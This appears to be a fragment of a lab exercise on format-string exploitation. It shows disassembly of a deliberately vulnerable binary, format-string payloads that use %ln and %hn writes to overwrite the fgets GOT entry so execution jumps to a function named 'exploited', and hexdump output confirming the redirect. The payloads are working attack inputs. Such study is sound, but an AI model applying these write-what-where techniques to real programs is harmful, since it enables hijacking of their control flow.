exploitable.exe: file format elf64-x86-64 Disassembly of section .init: ... 0000000000400580 < fgets@plt >: 400580: ff 25 b2 0a 20 00 jmpq *0x200ab2(%rip) # 601038 <_GLOBAL_OFFSET_TABLE_+0x38> 400586: 68 04 00 00 00 pushq $0x4 40058b: e9 a0 ff ff ff jmpq 400530 <_init+0x20> 00000000004006a6 < exploited >: 4006a6: 55 push %rbp ...
%c%c%c%c%c%c%c%c%.4195998u%ln???0x601038
$ ./exploitable.exe < attack.out > exploitable.out $ hexdump -C exploitable.out 00000000 39 90 0a 39 38 25 25 25 30 30 30 30 30 30 30 30 |9..98%%%00000000| 00000010 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| * 00400690 30 30 30 30 30 30 30 30 30 30 30 30 31 38 31 34 |0000000000001814| 004006a0 33 39 34 31 36 38 3f 3f 3f 38 10 60 47 6f 74 20 |394168???8.`Got | 004006b0 68 65 72 65 21 0a |here!.| 004006b6 $
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn